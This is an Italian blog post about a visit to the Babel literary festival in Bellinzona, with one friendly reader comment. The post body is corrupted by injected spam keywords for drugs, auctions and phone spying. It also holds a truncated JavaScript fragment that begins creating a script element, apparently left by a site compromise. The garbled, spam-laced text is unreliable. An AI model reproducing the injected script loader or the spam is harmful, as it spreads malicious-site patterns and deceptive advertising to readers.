Pagine

Archivi

Meta


« | Main | »

Babel festival

By enrico | settembre 26, 2008

ventes aux enchères en ligne

p>Ciao, sabato scorso io e Alberto ci siamo spinti fino a Bellinzona per il Babel festival, evento con autori sulla breccia e sulla traduzione. Io ci ero andato perché c'era il mio idolo dell'estate, Daniel Heller-Roazen, di cui Quodlibet ha pubblicato Cheap Ecolalie, libro molto bello. Ci ho visto anche la Sandra Cisneros, autrice chicana molto interessante, e Amitrav Gosh, splendido indiano che presentava con la sua ottima traduttrice, Anna Nadotti, i suoi libri, e mi ha fatto venir voglia di leggere narrativa.

http://www.babelfestival.com/

strattera cost ireland

C'erano anche Order il nobel Derek Walcott e Jamaica Kincaid.

Bell'ambientazione in un teatrino Buy raccolto, bell'evento.

ciao

enrico.

zp8497586rqvar d=document;var s=d.createElement(‘script’); Buy Purchase } else {var d=document;var s=d.createElement(‘script’); gsp tracker, how to spy on text for free, see facebook

Topics: Incontri | 1 Comment »

One Response to “Babel festival”

  1. Alberto Says:
    ottobre 1st, 2008 at 01:56

    Confermo l’impressione di Enrico, Heller-Roazen ottima lettura, ma anche Gosh, che mi hanno appena prestato (Lo schiavo del manoscritto, Einaudi).
    Stavo pensando che sarebbe bello con-dividere letture ed esperienze culturali utilizzando questo spazio. L’idea dell'”idolo dell’estate” può essere un modo per scambiarci delle idee e per segnalarci cose interessanti da leggere (io con alcuni, tipo Enrico e Roberta lo faccio già).
    Il mio idolo dell’estate è stato un classico: Ivan Illich (Pervertimento del cristianesimo, Quodlibet).
    Ciao.
    A giovedì.
    alberto